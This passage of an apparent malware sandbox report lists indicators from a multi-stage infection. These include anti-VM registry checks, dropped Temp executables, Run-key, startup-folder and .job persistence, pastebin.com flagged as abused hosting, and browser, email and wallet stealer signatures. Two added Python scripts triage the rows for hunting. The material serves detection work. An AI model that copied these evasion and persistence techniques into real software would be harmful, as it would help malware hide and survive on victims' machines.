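Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\gmwu\wtrpqgw.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\gmwu\wtrpqgw.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\ProgramData\gmwu\wtrpqgw.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
"""

# The registry key may contain spaces ("Control Panel"); the process path does not.
ROW_RE = re.compile(r"^(Key opened|Key value queried)\s+(\\REGISTRY\\.+?)\s+(C:\\\S+)\s+N/A$")

# Key suffixes flagged in the tables, mapped to the kind of check they implement
# (categories are this example's own labels).
CHECKS = {
    r"\HARDWARE\ACPI\DSDT\VBOX__": "vbox-acpi",
    r"\HARDWARE\DESCRIPTION\System\SystemBiosVersion": "bios-version",
    r"\HARDWARE\DESCRIPTION\System\VideoBiosVersion": "bios-version",
    r"\Software\Wine": "wine",
    r"\Control Panel\International\Geo\Nation": "geo-nation",
}
ANTI_VM_TRIAD = {"vbox-acpi", "bios-version", "wine"}


def check_kind(key):
    for suffix, kind in CHECKS.items():
        if key.endswith(suffix):
            return kind
    return None


def profile(text):
    """Map each process path to the set of check kinds it performed."""
    per_process = defaultdict(set)
    for line in map(str.strip, text.splitlines()):
        m = ROW_RE.match(line)
        if not m:
            continue
        kind = check_kind(m.group(2))
        if kind:
            per_process[m.group(3)].add(kind)
    return dict(per_process)


def shared_stub(profiles):
    """Processes that run the full VBox/BIOS/Wine triad: candidates for one shared loader."""
    return sorted(p for p, kinds in profiles.items() if ANTI_VM_TRIAD <= kinds)


def geo_only(profiles):
    """Processes that only read the locale and do no VM check."""
    return sorted(p for p, kinds in profiles.items() if kinds == {"geo-nation"})


def user_writable(profiles):
    """Checked processes running from user-writable paths: the hunting set for an EDR query."""
    return sorted(p for p in profiles if re.search(r"\\(AppData|ProgramData)\\", p, re.I))


if __name__ == "__main__":
    prof = profile(ROWS)
    print("triad:", shared_stub(prof))
    print("geo only:", geo_only(prof))
    print("hunt:", user_writable(prof))
```

The mshta.exe row is worth keeping separate in any hunt: it is a signed Windows binary, so the locale check there is coming from script content it was handed, and the path filter deliberately leaves it out of the user-writable set.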

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\gmwu\wtrpqgw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\ProgramData\gmwu\wtrpqgw.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A (identical row repeated 24 times)

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\035c4d64c6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107920101\\035c4d64c6.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a6f3c10671.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107930101\\a6f3c10671.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\99878a5969.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\99878a5969.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\xLUFfgfR\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4abf414f45.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107910101\\4abf414f45.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
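
The Run-key rows under "Adds Run key to start application" and the three legacy Task Scheduler 1.0 .job files in this table are the persistence the sandbox recorded. The script below is an added example, not code from the sandbox or from any of the families the report names: it parses both row types as they appear on this page, undoes the C-style escaping the report applies to registry data (doubled backslashes, escaped quotes in the Anubis entry), and scores each entry. SAMPLE_ROWS is constructed from the two tables; the USER_WRITABLE prefixes and SCRIPT_EXT list are assumptions made for the example.

```python
"""Persistence triage over flattened sandbox signature rows.

Added example, not code from the sandbox or from any malware family the
report names. It parses the Run-key 'Set value (str)' rows and the
'File created' rows for legacy .job files, undoes the C-style escaping the
report applies to registry data, and scores each entry. SAMPLE_ROWS is
constructed from this report's own two tables; USER_WRITABLE and SCRIPT_EXT
are assumptions made for the example.
"""
import re
from dataclasses import dataclass, field

SAMPLE_ROWS = r'''
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\035c4d64c6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107920101\\035c4d64c6.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a6f3c10671.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107930101\\a6f3c10671.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\99878a5969.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\99878a5969.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\xLUFfgfR\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4abf414f45.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107910101\\4abf414f45.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
'''

# Registry data is quoted and C-escaped: \\ for a backslash, \" for a quote.
RUN_ROW = re.compile(
    r'^Set value \(str\) \\REGISTRY\\(?:USER|MACHINE)\\\S*?CurrentVersion\\Run\\'
    r'(?P<name>[^\\ ]+) = "(?P<data>(?:[^"\\]|\\.)*)" (?P<writer>\S+) N/A$')
JOB_ROW = re.compile(
    r'^File created (?P<path>C:\\Windows\\Tasks\\(?P<name>.+?\.job)) (?P<writer>\S+) N/A$')
USER_WRITABLE = ('\\appdata\\local\\', '\\appdata\\roaming\\', '\\programdata\\', '\\users\\public\\')
SCRIPT_EXT = ('.cmd', '.bat', '.vbs', '.js', '.hta', '.ps1')


@dataclass
class Finding:
    kind: str      # 'run_key' or 'job_file'
    name: str      # Run value name or .job file name
    target: str    # program the entry launches, or the .job path
    writer: str    # process that created the entry
    reasons: list = field(default_factory=list)


def unescape_registry_data(data):
    """Undo the report's escaping: a backslash quotes the next character."""
    return re.sub(r'\\(.)', r'\1', data)


def exe_from_command(cmd):
    """First token of a Run value, honouring a quoted path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        return cmd[1:cmd.index('"', 1)]
    return cmd.split(' ', 1)[0]


def score(kind, target, writer):
    reasons = []
    if kind == 'job_file':
        reasons.append('legacy .job file dropped in the Tasks directory')
    if any(p in target.lower() for p in USER_WRITABLE):
        reasons.append('target lives in a user-writable location')
    if target.lower().endswith(SCRIPT_EXT):
        reasons.append('target is a script rather than a PE')
    if any(p in writer.lower() for p in USER_WRITABLE):
        reasons.append('entry written by a process running from a user-writable location')
    return reasons


def extract_persistence(rows):
    findings = []
    for line in rows.splitlines():
        if m := RUN_ROW.match(line):
            target = exe_from_command(unescape_registry_data(m['data']))
            findings.append(Finding('run_key', m['name'], target, m['writer'],
                                    score('run_key', target, m['writer'])))
        elif m := JOB_ROW.match(line):
            findings.append(Finding('job_file', m['name'], m['path'], m['writer'],
                                    score('job_file', m['path'], m['writer'])))
    return findings


if __name__ == '__main__':
    for f in extract_persistence(SAMPLE_ROWS):
        print(f'{f.kind:8} {f.name:16} {f.target}')
        for r in f.reasons:
            print('         -', r)
```

Every entry on this page scores on at least two reasons: each target sits under AppData, and each writer is itself running from Temp or Roaming. The regex also accepts REGISTRY\MACHINE so the same parser covers HKLM Run rows from other reports; the am_no.cmd entry is the one that is a script rather than a PE.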

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\gmwu\wtrpqgw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
